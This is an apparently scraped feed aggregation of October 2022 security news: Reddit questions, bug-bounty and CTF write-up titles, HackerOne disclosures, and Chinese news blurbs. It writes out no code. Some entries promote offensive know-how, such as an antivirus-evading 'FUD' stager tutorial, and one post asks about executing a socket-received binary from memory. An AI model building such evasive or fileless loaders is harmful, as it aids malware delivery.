    On occasion I will run Python's http.server script to share large project files with coworkers. However today another IP address gained access to the server during a download. The files are encrypted with 7z, but the files can still be accessed by anyone. Instead of coming up with a whole new method of file transfering I would just like to only allow a single IP to access it at a time. So far I've only been able to blacklist a single IP or all with Windows Firewall. I can't seem to figure out how to block all but a single one. Web searching has brought up nothing that works. The only thing I've found is to lockdown all Internet traffic and allow a single IP through as an exception. This isn't an option since I want to still use my computer during the transfers. Edit: By default it looks like Windows firewall will always set block rules above allowed. This was disabling my allow exception. Override options could have been made by changing the settings with it. But instead I just blocked the range of IPs above and below the single one I wanted through. submitted by /u/TheThinSister [link] [comments]
    Looking for feedback on Halcyon's anti-ransomware product -- is it worth the hype?
    I'm doing some research on Halcyon's anti-ransomware agent ahead of a call and perhaps demo of it. Anybody out there have real-world experience with it and have feedback to share? Or looked into the details of it have doubts about their claims to prevent ransomware attacks? submitted by /u/EnterNam0 [link] [comments]
    Is BYOD good or not? Why would anyone but an organization want this policy?
    I'm in school for secure systems admin and engineering and our discussion board is having us read case studies about BYOD policies. I honestly do not see how anyone in the US (or anywhere else) would want or be okay with bringing their own devices for work use. I'm trying to not be biased, but I just don't understand why anyone would think this is a good idea. Everything I've found on Google is like "why byod isn't bad" or "how to secure byod with workspaces" but offers no substance. Like even the Amazon Workspace case studies don't actually read like a case study, it's an advertising blog that promotes it like its a solution and not a list of future problems. 20% of data breaches had to deal with BYOD. What's to stop a really motivated coworker or stranger from gaining access to a device and spreading someone's private data? It creates so many ethical questions. So how do I find unbiased information on this? It seems like a security nightmare, makes centralized IT more challenging, I just don't understand why or how anyone could want this. Signing an acceptable use policy for devices I own and maintain myself, with my private data on it seems like a horrible idea. Just why? Tldr: Are byod devices ethical, pragmatic, ect? Info I've googled all seems biased because they're trying to sell the idea or a service. Anyone have links to unbiased case studies that aren't trying to market a policy or service? submitted by /u/fudginjerk [link] [comments]
    How can we stress-test our 3rd party L4 DDoS mitigation service?
    Hi, we are using a DDoS mitigation service from DataPacket for our game server hosting company. They provide L4 DDoS mitigation (L7 is in development.) Because we just recently started this company and just recently gotten with DataPacket we haven't actually been hit with attacks, so we have no way of verifying how good it is. We also need this information for marketing purposes. I'm thinking of spinning up compute with one of the big 3 cloud providers and write a script that uses hping3, but if there's a legal managed service that does this for us it's greatly appreciated. submitted by /u/soggynaan [link] [comments]
    Nmap Scan shows "sslstrip" as open port. Does this mean there was a compromise?
    Hello, we did a nmap scan over a companies network and I'm analysing it now. On one host (not maintained by me) it shows port 5800 open and says "http-proxy - sslstrip" as the version? Does this mean that we are already man-in-the-middled by an attacker? Or is this maybe a false positive? Are there any other reasons to use sslstrip? Thanks for your help. submitted by /u/kappadoky [link] [comments]
  • Open

    Active Directory Lateral Movement and Post-Exploitation Cheat Sheet
    This is a detailed cheat sheet to help you with many high end certifications like CRTE, OSEP, and definitely OSCP and beyond. Continue reading on Medium »
    Red Team: Initial Access — Weaponization | Try Hack Me
    Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms… Continue reading on Medium »
    Red Team: Initial Access — Red Team Reconnaissance | Try Hack Me
    Hello world and welcome to HaXeZ, in this post I’m going to be discussing the Red Team Reconnaissance room on TryHackMe. This room focuses… Continue reading on Medium »
  • Open

    BigCommerce Launches a Public Bug Bounty Program
    Today, we are excited to launch our Public Bug Bounty Program that allows any security researcher to submit vulnerabilities to the… Continue reading on BigEng »
    A 250$ CSS Injection — My First Finding on Hackerone!
    This is my first post on medium, to tell the story of how I found a CSS injection and exploited it, so you can learn a new attack vector… Continue reading on Medium »
    My first ‘bug bounty’… Kind of.
    Lets set the scene. Continue reading on Medium »
    The Best Vulnerability Disclosure Programs (Less Competitive Bounties)
    TL;DR- There’s a ton of programs for bug bounties and vulnerability disclosure, but they’re usually filled with competition because… Continue reading on The Gray Area »
    How I Found P1 with Google Dork on Bugcrowd Program
    Tool Continue reading on System Weakness »
    How I bypass the OTP of a well known website.
    Hello Learners, I am Rajneesh K. Arya again here with my new blog on OTP bypassing. So let’s check what google said about it. Continue reading on Medium »
    How I Found P1 in Bugcrowd with only Recon
    Tool Continue reading on System Weakness »
    Tonic Dex сотрудничает с ImmunFi в рамках программы “bug bounty”
    В Tonic Dex мы серьезно относимся к безопасности средств пользователей. Continue reading on Medium »
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    Hello dear writers Continue reading on InfoSec Write-ups »
    Hatalı Yapılandırılmış AWS S3 Bucket Üzerinde Bulunan Güvenlik Açığının Yarattığı Etkiler…
    Herkese merhaba, bu yazımda HackerOne platformuna bağlı private bir şirkette bulduğum güvenlik açığından bahsedip burada dikkat etmemiz… Continue reading on Medium »
  • Open

    OpenSSL warns of critical security vulnerability with upcoming patch
    Article URL: https://www.zdnet.com/article/openssl-warns-of-critical-security-vulnerability-with-upcoming-patch/ Comments URL: https://news.ycombinator.com/item?id=33364183 Points: 10 # Comments: 0
    High-severity vulnerability in GitHub was susceptible to Repo Jacking
    Article URL: https://www.scmagazine.com/analysis/cloud-security/high-severity-vulnerability-in-github-was-susceptible-to-repo-jacking Comments URL: https://news.ycombinator.com/item?id=33358243 Points: 1 # Comments: 0
    RepoJacking Vulnerability in GitHub
    Article URL: https://medium.com/checkmarx-security/attacking-the-software-supply-chain-with-a-simple-rename-1d9a9a126217 Comments URL: https://news.ycombinator.com/item?id=33354936 Points: 1 # Comments: 1
  • Open

    Towards the next generation of XNU memory safety: kalloc_type
    submitted by /u/sanitybit [link] [comments]
    GitHub - karimhabush/cis-vsphere: A tool to assess the compliance of a VMware vSphere environment against the CIS Benchmark.
    submitted by /u/karimhabush [link] [comments]
    One-Time Programs
    submitted by /u/feross [link] [comments]
    control flow unflattening of an android rasp sdk
    submitted by /u/eybisi_ [link] [comments]
    Open source automated Tailscale security best practices benchmark assessment just released by Steampipe.io
    submitted by /u/stevecio [link] [comments]
    A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
    submitted by /u/SSDisclosure [link] [comments]
    Visual Studio Code Jupyter Notebook RCE (CVE-2021-26437)
    submitted by /u/nibblesec [link] [comments]
    Hexacon conference videos
    submitted by /u/gquere [link] [comments]
    Divin'n'phishin with executable filetypes on Windows
    submitted by /u/ljulolsen [link] [comments]
    Building a multifunctional red team dropbox for USB and Ethernet attacks
    submitted by /u/RoganDawes [link] [comments]
    🪄 wb - A wizard that brings old files from Wayback Machine.
    submitted by /u/rjz4 [link] [comments]
    Ethernet ghosting & NAC bypass - A practical overview
    submitted by /u/Gallus [link] [comments]
  • Open

    Openzeppelin Ethernaut Part — 0X00
    No content preview
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    No content preview
    Cyber Security Control Validation Platform
    No content preview
  • Open

    Openzeppelin Ethernaut Part — 0X00
    No content preview
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    No content preview
    Cyber Security Control Validation Platform
    No content preview
  • Open

    Openzeppelin Ethernaut Part — 0X00
    No content preview
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    No content preview
    Cyber Security Control Validation Platform
    No content preview
  • Open

    Jolokia Reflected XSS
    Mars disclosed a bug submitted by ramzanrl: https://hackerone.com/reports/1714563
    CVE-2022-42916: HSTS bypass via IDN
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1730660
    CVE-2022-35260: .netrc parser out-of-bounds access
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1721098
    Subdomain takeover on 'de-headless.staging.gymshark.com'
    Gymshark disclosed a bug submitted by a-p0c: https://hackerone.com/reports/1711890
  • Open

    SecWiki News 2022-10-27 Review
    那些年我研发的无用模块——攻击样本回放模块 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-27 Review
    那些年我研发的无用模块——攻击样本回放模块 by ourren 更多最新文章,请访问SecWiki
  • Open

    Token handles abuse: One shell to HANDLE them all
    submitted by /u/gid0rah [link] [comments]
    Creating Fully Undetectable (FUD) Stager in C
    Hope you enjoyed the video and learned something new! https://youtu.be/Pu06zYUdpGs Still a lot of things to implement in order for this to be practical but I think it was fun seeing 0/26 AV detection. Feel free to improve it yourself and do it responsible, you are responsible for your own actions with that. submitted by /u/lsecqt [link] [comments]
    Lateral Movement via AutodialDLL registry key abuse
    submitted by /u/gid0rah [link] [comments]
  • Open

    Free: Dastardly from Burp Suite
    Introducing Dastardly - a free, lightweight web application security scanner for your CI/CD pipeline, from the makers of Burp Suite. Secure web development ain't easy Ensuring your code is written sec
    Coming very soon: Dastardly, from Burp Suite
    New product alert! Dastardly is a free, lightweight web application security scanner for your CI/CD pipeline - and it's going to be landing in the next few days. It'll check your application for seven
  • Open

    Free: Dastardly from Burp Suite
    Introducing Dastardly - a free, lightweight web application security scanner for your CI/CD pipeline, from the makers of Burp Suite. Secure web development ain't easy Ensuring your code is written sec
    Coming very soon: Dastardly, from Burp Suite
    New product alert! Dastardly is a free, lightweight web application security scanner for your CI/CD pipeline - and it's going to be landing in the next few days. It'll check your application for seven
  • Open

    特殊时期企业如何做好重保 | FreeBuf甲方群话题讨论
    重保既是抗击风险的重要举措,也是数字经济时代企业发展的“刚需”。在此背景下,企业应该如何做好重保?
    APT-Q-36:南亚摩诃草组织近期武器库迭代更新分析
    摩诃草广泛认为具有南亚地区某国家背景,其最早攻击活动可以追溯到2009年11月,已持续活跃10余年。
    年仅 16 岁,入侵微软等 18 家跨国巨头,LAPSUS$  黑客组织“狠疯狂”
    更多年轻、疯狂的LAPSUS$ 黑客组织,可能正隐藏在暗处,伺机而动。
    先睹为快!CIS 2022网络安全创新大会议题抢先公布
    打破空间阻隔,共话网络安全,给参会嘉宾和线上观众带来一场不一样的网安盛宴。
    一个隐藏SQLite数据库长达22年的漏洞
    安全专家Andreas Kellas详细介绍了2000年10月推出的SQLite数据库中的一个高严重性漏洞。
    数据泄露长达两年半!国际票务巨头See Tickets 已承认
    调查显示,攻击始于2019 年 6 月,直到2022年1月,恶意代码才从网站上彻底清除。
    瞰清新威胁,构筑新防线——加密流量检测技术创新与运营实践 | CIS 2022网络安全创新大会议题前瞻
    议题将讲述通过运用加密网络安全、加密威胁情报、加密态势感知等一站式加密威胁运营体系来帮助多行业客户提升在加密威胁发现、分析、防护等方面的能力。
  • Open

    How to Get the Most Out of Your Pentest
    TL;DR Define the goal of an assessment. Take time to choose the right assessment type. The more detail you give about an asset, the better quality your report will be. Select the right environment for the assessment. Consider the timing for performing the assessment. Communicate internally and make sure everyone is up to speed. Do... The post How to Get the Most Out of Your Pentest appeared first on TrustedSec.
  • Open

    Extract certificates from running openvpn server process?
    First time in /r/computerforensics Hello! My VPN-Server (Ubuntu 18.04.3 running Webmin with openVPN (v2.4.4)-module) somehow got its server certificates deleted. The certificates must be somewhere in memory because users can still create new connections. But a restart of the service will (of course) change that. I've looked a little into the "dumpcerts" plugin of volatility but was dismayed to find that this doesn't really work on a unix machine. I'm also not 100% sure if openVPN doesn't somehow mangle the files when reading them in, which would make recovery impossible. The files in question were: /etc/openvpn/keys/[servername]/ca.crt /etc/openvpn/keys/[servername]/[servername].crt /etc/openvpn/keys/[servername]/[servername].key /etc/openvpn/keys/[servername]/dh4096.pem The whole directory got wiped (not sure how. Someone probably misclicked something. Need to make backups of this in the future). The Server is a VM and I have a snapshot from when it was working, so I can always test the connection and go back to a working state. Is there any chance to recover these files? If you could just point me in the direction of programs I could possibly use for this, that'd be great. I do not want to have to roll out over 400 new VPN-configurations to my users. Thanks in advance. submitted by /u/Snowman25_ [link] [comments]
    Xbox Series X forensics
    Any advice on tools that can help with Xbox Series X forensic analysis? The disk is encrypted, obviously. The user has setup a user password. Is cloning the disk and guessing the password manually the only way? submitted by /u/examiner_234234 [link] [comments]
    After Digital Forensics
    Since burn-out is high in the forensics field, I just wanted to check in with all the former digital forensics people. How are you? I spent 5 years in the field myself, and have zero plans on ever going back. The skills I learned (analysis, project management, deadline management, juggling multiple things) have all translated well into project work quite nicely. I'm not the smartest on my team, but I hold my own quite well amongst my peers, and we all work very well together. I do want to thank everyone that contributes to this field! If it's just answering a random question on a forum, or building a full blown forensics suite, you are helping far more than you know. It felt great to work amongst all of you, and the work you put in over the years. submitted by /u/MakingItElsewhere [link] [comments]
  • Open

    Mengekspos Salah Satu Produsen Hoax
    Beberapa waktu lalu sempat viral video YouTube yang memberitakan bahwa Uskup se Jabodetabek deklarasi memberi dukungan kepada salah satu… Continue reading on Medium »
    URL Shortner
    URL-shortening websites van bijvoorbeeld: bitly.com of tinyurl.com worden gebruikt om bestaande lange URL ‘s (uniform resource locator) te… Continue reading on Medium »
    How regular expressions can be useful in OSINT. Theory and some practice using Google Sheets
    This article consists of three short parts. Continue reading on Medium »
  • Open

    Art Models 360 Photos
    http://artmodels360.com/rotate_images/ submitted by /u/c-rn [link] [comments]

  • Open

    Active Directory Cheat Sheet
    This is a detailed AD cheat sheet with descriptions. Continue reading on Medium »
    Creating Fully Undetectable Payload (FUD) with C
    Welcome back my red teamers! Today’s blog is exciting because I personally did not expect such high result at evading AV vendors! Continue reading on Medium »
    GCPgoat Scenarios
    https://gcpgoat.joshuajebaraj.com/ Continue reading on Medium »
  • Open

    Some Random ODs (Mostly Software)
    https://www.1pei.me/software/ https://bits.sigpipe.me https://birds-are-nice.me/software/ https://archive.wfv.me https://www.freedesktop.org/software/ submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Webauthn and passkeys
    Android and iOS are now using passkeys to store Webauthn credentials (private keys), it allows the synchronization of authentication keys across multiple devices. Apple and google claim that the keys are end-to-end encrypted (here and here). Passkeys in the Google Password Manager are always end-to-end encrypted: When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices What's their proof that the keys are always encrypted ? is the software behind opensource ? do they follow some standard ? or should we just take their word ? Thanks submitted by /u/nobo92 [link] [comments]
    What cross-platform browser has end-to-end encrypted bookmarks, open tabs, and history and has syncing functionality besides Firefox? I heard Edge doesn’t have encrypted sync data and neither does Chrome.
    What cross-platform browser has end-to-end encrypted bookmarks, open tabs, and history and has syncing functionality besides Firefox? I heard Edge doesn’t have encrypted sync data and neither does Chrome. submitted by /u/Bored-Giraffe [link] [comments]
    Netsec fundamentals to pair with CS?
    I'm completing the OSSU in the next few months with an emphasis on web development. Thus far my job hunting has not been fruitful due to my lack of a formal degree, but several interviewers have been nice enough to offer guidance on how I might improve my changes to launch a CS career. One that came up more often than not was going in on the IT side of the industry rather than straight in with development. If I understand correctly, netsec can lean toward the IT but absolutely values the CS domain knowledge as well. That being the case, I wonder what IT and sec fundamentals to pursue in order to best complement my CS knowledge? I can see there is no shortage of vendor jargon and very domain specific info for various specialized niches of sec, but I would assume there are core fundamentals that run the gamut. Is it as simple as studying Networking? What kind of path would you suggest? Thanks in advance! [link] [comments]
    Real world examples on MITM attacks on Backend-to-backend flows (via Internet)
    Could you provide any real world attack examples on TLS MITM done on Backend-to-backend connections? [ server of org A ] ----> [server of org B] [ server of org A ] --(TLS MITM)--> [server of org B] (e.g. Backend server belong to one organization connecting to a service provided by another organization) I have read about TLS MITM on customer to website flows using things like DNS poison via BGP hijack/DNS registrar account hack/etc + getting trusted cert (e.g. myetherwallet.com , banrisul bank, etc). But I was not able to find any info on successful TLS MITM on B2B connections. submitted by /u/skynetcoder [link] [comments]
  • Open

    Chatterbox Hackthebox
    No content preview
    Devel From HackTheBox
    No content preview
    TryHackMe writeup: Skynet
    A fun TryHackMe room that has its twist and turns. Featuring a PHP Meterpreter, SMB enumeration, and PwnKit! Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero
    No content preview
  • Open

    Chatterbox Hackthebox
    No content preview
    Devel From HackTheBox
    No content preview
    TryHackMe writeup: Skynet
    A fun TryHackMe room that has its twist and turns. Featuring a PHP Meterpreter, SMB enumeration, and PwnKit! Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero
    No content preview
  • Open

    Chatterbox Hackthebox
    No content preview
    Devel From HackTheBox
    No content preview
    TryHackMe writeup: Skynet
    A fun TryHackMe room that has its twist and turns. Featuring a PHP Meterpreter, SMB enumeration, and PwnKit! Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero
    No content preview
  • Open

    Blind Insecure Direct Object Reference (IDOR) Leads To Export Other User’s Data On Instagram.
    Original post: https://nobugescapes.com/blog/blind-insecure-direct-object-reference-idor-leads-to-export-other-users-data/ Continue reading on Medium »
    SSRF Bug Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on Medium »
    Stored XSS To Cookie Exfiltration
    Today I will be explaining an XSS (“Cross Site Scripting”) vulnerability I found in a private bug bounty program that allowed me to… Continue reading on Medium »
    Report a Security Vulnerability Like a pro in less than 15 min!
    Bug bounty programs have become a major part of the security industry. They offer corporations, government agencies, and even individuals… Continue reading on Medium »
    Developer and negligence.
    Hello guys, long time I didn’t write something about my journey in Cyber Security. I’m quite busy with my college activities and attending… Continue reading on Medium »
    When security issues are considered as features (GITHUB)
    After 3 times in a row reporting issues that they do considerate as ‘abuse’ and not a vulnerability, I am publishing a PoC for their… Continue reading on Medium »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero
    Let’s build Blind SQLi attack together, without tools but just with Python Continue reading on InfoSec Write-ups »
  • Open

    Hijacking AUR Packages by Searching for Expired Domains
    submitted by /u/whisperingmime [link] [comments]
    Ring0VBA - Getting Ring0 Using a Goddamn Word Document
    submitted by /u/CyberMasterV [link] [comments]
    Token handles abuse: One shell to HANDLE them all
    submitted by /u/gid0rah [link] [comments]
    OpenSSL: CRITICAL vulnerability will be fixed in upcoming release
    submitted by /u/josephnoir [link] [comments]
    Lateral Movement via AutodialDLL registry key abuse
    submitted by /u/gid0rah [link] [comments]
    topmostp: A simple CLI tool to retrieve the N top most used ports
    submitted by /u/deleee [link] [comments]
  • Open

    Give me your username. I’ll tell you who you are!
    OSINT tools for online social media research in Germany — an essay Continue reading on Medium »
    Publicly available information (PAI) is becoming increasingly important in the fields of…
    Continue reading on Medium »
    Cicada-3301 Cilt:1 Tryhackme WriteUp(Steganografi-kriptografi)
    Herkese selamlar bu yazımda sizlere Tryhackme platrofmunda yer alan Cicada-3301 Vol:1 odasını çözeceğim. Bu odada kriptografi ve… Continue reading on Medium »
  • Open

    SecWiki News 2022-10-26 Review
    DEAR:一种基于深度学习的程序自动修复方法 by ourren 攻防演练态势及防守思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-26 Review
    DEAR:一种基于深度学习的程序自动修复方法 by ourren 攻防演练态势及防守思路 by ourren 更多最新文章,请访问SecWiki
  • Open

    OpenSSL 3.0.7 update to fix Critical CVE out next Tuesday 1300-1700UTC
    Article URL: https://twitter.com/iamamoose/status/1584908434855628800 Comments URL: https://news.ycombinator.com/item?id=33343946 Points: 6 # Comments: 1
    I took a look at the most active GitHub users who publish the most CVE's
    Article URL: https://github.com/tg12/PoC_CVEs/blob/main/cve_links_by_github_username.txt Comments URL: https://news.ycombinator.com/item?id=33341794 Points: 2 # Comments: 0
  • Open

    Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
    We examine trends in web threats for the second calendar year quarter of 2022, including how a malicious JavaScript downloader is evolving to evade detection. The post Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving appeared first on Unit 42.
  • Open

    Meet PortSwigger's first women in tech scholars
    PortSwigger recently launched a scholarship scheme, specifically directed at creating opportunities for young women to kick-start their tech career. Our scholarships offer paid work opportunities, tai
  • Open

    Meet PortSwigger's first women in tech scholars
    PortSwigger recently launched a scholarship scheme, specifically directed at creating opportunities for young women to kick-start their tech career. Our scholarships offer paid work opportunities, tai
  • Open

    攻防演练下的实战思路:壹
    以某次省级攻防演练为例聊聊我的突破思路。
    FreeBuf早报 | 美海军发布《网络空间优势愿景》;96%公司表示敏感云数据安全性低
    乌克兰计算机应急小组(CERT-UA)已经发布了一个关于潜在的古巴勒索软件攻击该国关键网络的警报。
    SMB 攻击威胁模拟与防御
    一把梭老师又来啦!
    DevSecOps破局,纵深一体化安全研运让价值高效流动
    开源网安谈DevSecOps破局之路
    提高警惕!有人在GitHub上利用虚假 PoC 漏洞利用钓鱼
    GitHub是最大的代码托管平台之一,研究人员用它来发布PoC漏洞,以帮助安全社区验证漏洞的修复或确定一个漏洞的影响和范围。
    注意,苹果iOS这一关键0Day漏洞已经发布安全更新
    苹果公司推出了新的安全更新,以修复 iOS 和 iPadOS 中的一个零日漏洞。
  • Open

    Weak randomness in WebCrypto keygen
    Node.js disclosed a bug submitted by bnoordhuis: https://hackerone.com/reports/1690000
    HTTP Request Smuggling Due to Incorrect Parsing of Header Fields
    Node.js disclosed a bug submitted by vvx7: https://hackerone.com/reports/1675191
    CVE-2022-32213 bypass via obs-fold mechanic
    Node.js disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1630336
    Node 18 reads openssl.cnf from /home/iojs/build/... upon startup on MacOS
    Node.js disclosed a bug submitted by mhdawson: https://hackerone.com/reports/1695596
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)
    Node.js disclosed a bug submitted by shacharm: https://hackerone.com/reports/1665156
    Business Logic, currency arbitrage - Possibility to pay less than the price in USD
    PortSwigger Web Security disclosed a bug submitted by xctzn: https://hackerone.com/reports/1677155
  • Open

    TCP/IP 漏洞 CVE-2022-34718 PoC 还原及漏洞分析
    作者:Numen Cyber Labs 原文链接:https://mp.weixin.qq.com/s/5oBAw-oLtHA52-0eBcPSpg 背景和准备 微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。为了验证该漏洞的影响范围和可能后果,Numen 高级安全研究团队对此漏洞做了深入的分析,并通过补丁对比,还原出了PoC。本文将详细介绍我们如何通过补丁对比还原出PoC,以...
    TOTOLINK NR1800X 系列 CVE 分析
    作者:The_Itach1@知道创宇404实验室 日期:2022年10月25日 漏洞简介 TOTOLINK NR1800X最近报了一些cve,现主要对其命令注入进行具体分析,以及对其登录绕过进行分析。 固件下载地址:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/ids/36.html 环境搭建 固...
  • Open

    TCP/IP 漏洞 CVE-2022-34718 PoC 还原及漏洞分析
    作者:Numen Cyber Labs 原文链接:https://mp.weixin.qq.com/s/5oBAw-oLtHA52-0eBcPSpg 背景和准备 微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。为了验证该漏洞的影响范围和可能后果,Numen 高级安全研究团队对此漏洞做了深入的分析,并通过补丁对比,还原出了PoC。本文将详细介绍我们如何通过补丁对比还原出PoC,以...
    TOTOLINK NR1800X 系列 CVE 分析
    作者:The_Itach1@知道创宇404实验室 日期:2022年10月25日 漏洞简介 TOTOLINK NR1800X最近报了一些cve,现主要对其命令注入进行具体分析,以及对其登录绕过进行分析。 固件下载地址:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/ids/36.html 环境搭建 固...

  • Open

    Data mapping
    Hi everyone, I hope this is the right sub to ask. I’m on my company’s privacy team and currently working on a data map charting the flow of data through the company. Any ideas on which software or program to use to create it? I was thinking of using Visio but I was hoping for something more modern looking and that could be interactive, with drop downs incorporated that provide explanation and that sort of thing. Not sure if it exists but thought I’d ask. Thank you in advance! submitted by /u/millennial_dad [link] [comments]
    Very interesting case of AV quarantine gone wrong....
    Report here about how a UK company got breached by a phishing email. TDLR - phishing email arrives, malware gets put in quarantine by endpoint AV, but company still gets breached. Official report on event released. Here is the interesting comment in the report: The anti-virus in use quarantined the malware and dispatched an alert, but Interserve "failed to thoroughly investigate the suspicious activity," I always thought that malware in quarantine was a) detected by the software and b) while in quarantine the malware was just a zombie. But, obviously not in this case. The hackers seemed to have compromised every system. How, did this happen if the malware was quarantined (or was that just a symptom?) https://www.theregister.com/2022/10/25/gone_phishing_uk_data_watchdog/ submitted by /u/baghdadcafe [link] [comments]
    Remediate spoofed emails
    An email account of ours is getting spoofed, info@company.com. What I mean is someone or something is spamming hundreds of addresses a day and spoofing their email headers to make it look like those emails are coming from our info@company.com address. The issue is not that we are getting spoofed emails or humans replying back asking why we're flooding their inboxes. At this point from what I've seen it's 95+% messages from email servers rejecting delivery for various reasons and notifying us the email was not delivered. Our mail server is on MS365, MX, SPF, TXT, DMARC, DKIM are all set up and I am getting RUA summaries to the designated admin address. I have also changed mailbox passwords and enabled MFA. We do have an ERP system that uses App Passwords and likely a less secure version of SMTP to send email out. My question is if there is something that can be done when someone is spoofing your email in this way. Admittedly this is a new role for me, in the past, I've assigned this kind of work to our expert and he had the experience to know what to. Part of me wants to assume there's nothing to do about this beyond just filtering out the Delivery Failure emails and calling it a day. The other part of me is worried that some door may be open somewhere because of how my predecessor integrated our ERP platform and I'm simply not looking in the right place. I don't think the spam emails are coming from our email server but how can I be sure? submitted by /u/socal_it_services [link] [comments]
    Best practices for malware analysis and securing the environment you're testing in.
    How big companies proceed with analyzing malware? Do they have local sandboxes or use someone else's services like Hybrid Analysis or paid version of ANY.RUN? If they do it locally what are the best practices? Do you dedicate a VM? How do you secure it? Do you nest another VM inside it? submitted by /u/tryingtoworkatm [link] [comments]
    How can one use exec() to execute a file stored in a buffer (memory)? (C/C++)
    Hello everyone! I have a project where I receive a file over sockets into a buffer. I want to avoid writing this to a temporary file if at all possible; just execute and immediately free the buffer. In Windows, I believe I've seen that there is a way to link a DLL from a buffer, but I'm not quite sure how to do this in Linux/UNIX. I have full control on the format of both the binary file sent and the receiver, so any method involving .so files is a valid path. I'd like a bit more freedom than being constrained to receiving shell code. Thank you for your time! submitted by /u/1337InfoSec [link] [comments]
  • Open

    4 Ways Conventional SIEM Advances into NextGen SIEM
    submitted by /u/Pale-Cobbler-4895 [link] [comments]
    Melis Platform CMS patched for critical RCE flaw (CVE-2022-39297)
    submitted by /u/monoimpact [link] [comments]
    GitHub Actions are being abused to run mining operations
    submitted by /u/MiguelHzBz [link] [comments]
    Stranger Strings: An exploitable flaw in SQLite
    submitted by /u/jeandrew [link] [comments]
    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    submitted by /u/lohacker0 [link] [comments]
    Firefox and Chromium | Madaidan's Insecurities
    submitted by /u/gquere [link] [comments]
    Chapter 1 — From Gozi to ISFB: The history of a mythical malware family
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    Project Guidance - US Secondary Ed
    I'm a secondary biological sciences teacher that's been tasked with writing a science curriculum for a STEMM program - I'm using/want to use forensics as the basis of the 9th grade year. I have a handle bio and the physics, but I was told to include a coding and engineering project in the curriculum. I've got nothing for a forensics coding unit and a major problem being I know minimal coding. I read the FAQs and will check out the blogs and watch forensics lunch, but they all seem a bit over my head. Would anyone be able to point me in a direction for something that would be on a 9th grade level for students that have only been exposed to projects from Code.org and CodeHS? Is this even possible or is the background knowledge needed too great for such a thing? - so far all I can think of is trying to come up with some sort of fake code to have students look for patterns in as from listening to the news hackers sometimes have a digital signature. - most projects I have found are more about the legal side of computer forensics. Thanks for any recommendations! submitted by /u/eryngiumechinops [link] [comments]
    Usb Token with Digital Signature Certificate (DSC) extraction
    Hi. We received some usb dongles to identify its owner. They are similar to this: https://www.novelonlineservice.com/product-page/safenet-etoken-5110-usb-token We use tableau Bridge T8u as a write blcoker for usb extraction but it wont recognize it. As it is a DSC token, I was wondering the best approach to this. Maybe just normally insert it into the computer? submitted by /u/Albcunha [link] [comments]
    IoT Forensics
    Hello everyone, For a work at university, I want to create a framework for IoT forensics that covers the whole forensic process (from the proactive part to the actual forensic on the device). The thing is, I have to test/evaluate that framework. My initial idea was to do it on different IoT devices and show that the framework is applicable on all of them. Do you have any advice ? Another idea of testing the framework ? Which devices should I use ? Ideas of cheap devices on which I could do my tests ? Or maybe I can emulate several devices ? Thank you all for the help ! submitted by /u/Volitite [link] [comments]
  • Open

    How I define OSINT
    Ok, I’m finally just going to go ahead and start this. I’ve been sitting on this for too long and just procrastinating too much. I’ll add… Continue reading on Medium »
    Web Browsing Privacy with Kasm Workspaces
    About a year ago a colleague posted an interesting article (Safer browsing with Kasm) on how he was using Kasm’s Browser Isolation… Continue reading on Medium »
    Ad: “Selling war trophy from Ukraine, with traces of soldier’s blood”.
    It´s getting more common to stumbles across ads on the web advertising the sale of war trophies from the current Ukrainian war. Is this… Continue reading on Medium »
    OSINT 0x3: Getting Sillier…And Quicker!
    Disclaimer: this write-up is for educational purposes only. Use your skills for good. Continue reading on Medium »
  • Open

    Exploiting SSRF Using Export PDF
    Server Side Request Forgery (SSRF) is an attack where the server will act like a proxy for the attacker for accessing a local or to a… Continue reading on Medium »
    HTTP request smuggling Explained and Exploited Part 0x3
    Hi! My name is Hashar Mujahid, and today we will continue to discuss what HTTP request smuggling vulnerabilities are and how we can… Continue reading on InfoSec Write-ups »
    Support supports a Hacker
    Manipulating user accounts via Helpdesk Continue reading on Medium »
    Stepping Into Blockchains? It’s Time To Know the Basics…
    There’s a huge fuss surrounding Blockchains nowadays. Many people talk about it but only a few have a real understanding of it. Continue reading on Bug Zero »
  • Open

    DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector
